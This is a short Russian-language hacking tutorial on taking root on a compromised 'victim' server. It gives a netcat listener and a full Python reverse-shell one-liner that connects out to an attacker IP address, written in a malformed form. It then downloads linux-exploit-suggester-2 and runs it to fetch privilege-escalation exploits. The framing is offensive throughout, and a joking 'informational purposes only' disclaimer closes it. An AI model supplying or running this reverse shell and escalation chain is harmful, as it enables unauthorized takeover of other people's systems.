Получаем полный доступ к захваченному серверу. Exploit-Suggester
Введение:
В этой статье мы разберем как повысить свои привилегии на локальном сервере с помощью Exploit-Suggester, для чего это нужно?
Часто при получении доступа к серверу мы не имеем всех разрешений и не являемся администратором "root", но существуют уязвимости класса Priv Escalation, их суть заключается в предоставлении прав администратора с помощью лазейки в системе.
Утилита Exploit-Suggester помогает автоматически найти такие уязвимости и проэксплуатировать их!
Основное:
Чтобы запустить утилиту на стороннем компьютере для начала требуется скачать ее, для этого нужно иметь доступ к самому серверу, это осуществляется с помощью Reverse Shell, о чем мы уже говорили ранее:
nc -lvnp 4000
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("94.43.65.1.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
После этого можем скачать утилиту:
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Теперь самое интересное, мы запустим утилиту и заставим выдать нам права администратора на сервере жертвы:
./linux-exploit-suggester-2.pl
Нам выдаст список уязвимостей, но нам нужно не только узнать к чему уязвима система но и проэксплуатировать ее, запустим утилиту с флагом -d и скачаем эксплоиты:
./linux-exploit-suggester-2.pl -d
Теперь мы можем получать root доступ!
Вывод:
Чтобы получить Root доступ достаточно просто воспользоваться данной утилитой, но важно помнить что не всегда автоматика может помочь в эксплуатации, если Exploit-Suggestser не смогла справиться, то самое время поискать свои уязвимости в системе!
Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.